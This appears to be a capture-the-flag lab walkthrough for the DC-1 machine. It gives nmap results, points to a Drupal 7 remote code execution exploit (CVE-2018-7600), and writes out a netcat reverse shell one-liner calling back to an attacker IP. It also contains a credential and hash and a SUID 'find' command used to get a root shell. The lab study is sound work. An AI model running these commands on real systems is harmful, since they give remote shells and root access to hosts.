DC-1

22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to Drupal Site | Drupal Site
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache/2.2.22 (Debian)
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          37701/tcp   status
|   100024  1          39759/udp6  status
|   100024  1          45295/tcp6  status
|_  100024  1          55275/udp   status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
​
running the nikto reveals it's running drupal 7
This means that it's most likely vulnerable to RCE. 
GitHub - pimps/CVE-2018-7600: Exploit for Drupal 7 <= 7.57 CVE-2018-7600
GitHub
The script tries to execute "id" command by default and running the script shows it was successful. Now we have RCE. 
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.164 4545 >/tmp/f
​
Reverse shell command worked. (Ensure to use double quotes around the commands or you'll receive a reverse shell from your own machine)
Priv Esc 
R0ck3t
$S$DAK00p3Dkojkf4O/UizYxenguXnjv
SUID binary find found
ran the command from and we are root!! https://gtfobins.github.io/gtfobins/find/​
find . -exec "/bin/bash" -p \;
squid (Squid proxy & localservice priv for newer windows)
Hutch
Last modified 10mo ago